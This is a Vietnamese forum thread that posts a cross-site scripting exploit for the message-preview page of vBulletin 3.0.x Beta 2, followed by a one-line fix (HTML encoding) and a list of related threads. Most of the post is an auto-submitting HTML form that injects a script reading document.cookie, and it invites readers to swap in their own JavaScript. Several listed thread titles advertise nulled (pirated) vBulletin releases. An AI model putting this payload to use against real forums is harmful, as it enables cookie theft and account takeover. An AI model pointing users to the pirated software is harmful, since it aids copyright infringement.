VBulletin Preview Message - Lỗi XSS

StyleVN · Aug 23, 2012

Version bị lỗi: vBulletin 3.0.x Beta 2

Code khai thác:
Nhớ đăng nhập trước
<html>
<body>
<form action="http://[victim]/forum/private.php" method="post"
name="vbform">
<input type="hidden" name="do" value="insertpm" />
<input type="hidden" name="pmid" value="" />
<input type="hidden" name="forward" value="" />
<input type="hidden" name="receipt" value="0" />

<input type="text" class="bginput" name="title" value="" size="40"
tabindex="2" />
<textarea name="message" rows="20" cols="70" wrap="virtual"
tabindex="3"></textarea>
<input type="submit" class="button" name="sbutton" value="Post Message"
accesskey="s" tabindex="4" />
<input type="submit" class="button" value="Preview Message" accesskey="p"
name="preview" onclick="this.form.dopreview = true; return
true;this.form.submit()" tabindex="5" >

<input type="checkbox" name="savecopy" value="1" id="cb_savecopy"
checked="checked" />
<input type="checkbox" name="signature" value="1" id="cb_signature" />
<input type="checkbox" name="parseurl" value="1" id="cb_parseurl"
checked="checked" />
<input type="checkbox" name="disablesmilies" value="1"
id="cb_disablesmilies" />
</form>
<script>
//Set Values và Submit
// Bạn có thể viết mã JS riêng của mình
var xss = "\"><script>alert(document.cookie)<\/script>";
document.vbform.title.value=xss;
document.vbform.preview.click();
</script>
</body>
</html>

Giải pháp:
HTML Encoding like post thread preview page

Admin · Aug 23, 2012

Lần sau dùng bbcode và post box hacking dùm anh nhé

Thread starter	Title	Forum	Replies	Date
L	Xin xin các pro giúp vBulletin	Vbulletin	3	Nov 4, 2021
	Change the height of the cke text editor vBulletin	Vbulletin	0	Jan 26, 2021
	Social Media vBulletin 5	Add-ons	0	Jan 2, 2021
	Ratings-Feedback vBulletin 5x	Add-ons	0	Nov 29, 2020
	DRC - Live Previews vBulletin 3.8.x	Add-ons	0	Nov 23, 2020
	Yilmaz - Postbit Background Usergroups vBulletin 5.x	Add-ons	0	Oct 22, 2020
	Yilmaz - Back to Top vBulletin 5.x	Add-ons	0	Oct 19, 2020
	JB: hCaptcha Human Verification vBulletin 4.x,x	Add-ons	0	Oct 17, 2020
	DRC - reCAPTCHA v3 vBulletin 3.x	Add-ons	0	Oct 16, 2020
	vBulletin 5.6.4 is now available for Download	Vbulletin	0	Oct 16, 2020
	Yilmaz - Easy Postbit User Information Settings vBulletin 3.8.x	Add-ons	0	Oct 15, 2020
V	Share vBulletin Connect 5.6.2 pl1 Nulled 5.6.2 pl1	Vbb released	0	Sep 9, 2020
	vBulletin Connect 5.6.3 is now available for download.	Vbulletin	13	Sep 8, 2020
	ProjectvB4 - Alpha vBulletin 4.2.x	Add-ons	0	Aug 13, 2020
	vBulletin Connect 5.5.4 nulled by tuoitreit.vn	Add-ons	2	Sep 7, 2019
	eBay Search function - code updated vBulletin	Add-ons	0	Aug 4, 2019
	Color in the forum link vBulletin	Add-ons	0	Aug 4, 2019
	vBulletin Connect 5.5.3 nulled by tuoitreit.vn	Add-ons	0	Jul 29, 2019
	Peel Away - Advertising vBulletin 5.4.x	Add-ons	0	Jul 28, 2019
	Cloudflare Registration Tools vBulletin 4.2.5	Add-ons	0	Jul 28, 2019
	vBulletin 4.2.5 Green Style	Add-ons	0	Jun 10, 2019
	All 31 skins from SultanTheme.com - for FREE and it's REAL for vBulletin 4.2.2	Add-ons	0	Jun 9, 2019
	Auto-Move Closed Reports vBulletin 4.x	Add-ons	0	Jun 1, 2019
	Userprogress-Bar for vBulletin 5.4.x	Add-ons	0	Mar 25, 2019
I	Help vbulletin Connect 5.5.0 to xenforo 2.1.0	Xenforo	15	Mar 6, 2019
	vBulletin Connect 5.5.0 nulled by tuoitreit.vn	Vbb released	9	Jan 23, 2019
	New Topic/Sub-Topic Online Effect Glow vBulletin 5.x	Vbb tutorial	6	Jan 21, 2019
	Auto-Postbit Selector for Mobile Browsers vBulletin 4.x	Vbulletin	0	Sep 17, 2018
	Duckways: Admin - Log in as vBulletin 5.x	Vbulletin	0	Aug 14, 2018
	Duckways: Picr.me image hosting integration vBulletin 5.x	Add-ons	0	Aug 9, 2018
	Hướng dẫn chuyển thanks từ vbulletin sang xenforo 1.5.x - Convert thanks vbulletin to like xenforo 1.5.x	Xenforo	2	Jul 3, 2018
	Yilmaz - Owl Carousel vBulletin 5.x	Vbulletin	9	Jan 14, 2018
	Hướng dẫn drop hàng loạt table rác aaggregate_temp cho vBulletin đơn giản	Vbulletin	0	Dec 20, 2017
	vBulletin suite 4.2.5 nulled by tuoitreit.vn	Vbb released	30	Jul 5, 2017
	vBulletin 4.2.3 PL2 patch only by tuoitreit.vn	Vbb released	0	Aug 15, 2016
	Share lại code vbulletin newstyleclan	Vbulletin	24	Jun 28, 2016
	vBulletin suite 4.2.3 PL1 patch only nulled by tuoitreit.vn	Vbb released	8	Jun 20, 2016
	vBulletin suite 4.2.2 PL5 patch only nulled by tuoitreit.vn	Vbb released	25	Jun 19, 2016
	Hướng dẫn backup dữ liệu vBulletin an toàn không lỗi bằng hình ảnh	Vbb tutorial	0	Oct 20, 2015
	Hướng dẫn cải tiến chức năng thống kê nhanh trong admincp cho vBulletin	Vbb tutorial	0	Jul 8, 2015
	vBulletin Suite 4.2.3 Beta 4 nulled by tuoitreit.vn	Vbb released	19	Apr 19, 2015
	vBulletin suite 4.2.2 PL4 patch only nulled by tuoitreit.vn	Vbb released	0	Jan 12, 2015
	vBulletin suite 4.2.2 PL3 patch only nulled by tuoitreit.vn	Vbb released	3	Dec 18, 2014
	Phát hiện lỗ hổng bảo mật mới trên vbulletin 4.2.2 patch level 2	SQL injection	1	Dec 16, 2014
	Hướng dẫn đổi màu liên kết cho vbulletin	Vbb tutorial	0	Oct 29, 2014
	Hướng dẫn thay màu chữ liên kết của tab navigation vbulletin	Vbb tutorial	1	Oct 28, 2014
	Phát hiện lỗ hổng bảo mật mới trên vbulletin 4.2.2 và vbulletin 4.2.3	Exploit	0	Oct 25, 2014
	Hướng dẫn fix lỗi table passwordhistory doesn't exist cho vbulletin	Vbb tutorial	0	Jun 25, 2014
	Hướng dẫn xóa toàn bộ chữ ký thành viên vbulletin	Vbb tutorial	0	May 20, 2014
	[Web and Art Solutions] Nivo slider for vBulletin 5	Add-ons	0	Apr 25, 2014

VBulletin Preview Message - Lỗi XSS

StyleVN

New Member

Admin

Well-Known Member

Facebook Comments

Similar threads

New posts New threads New resources

New posts

New threads

new_resources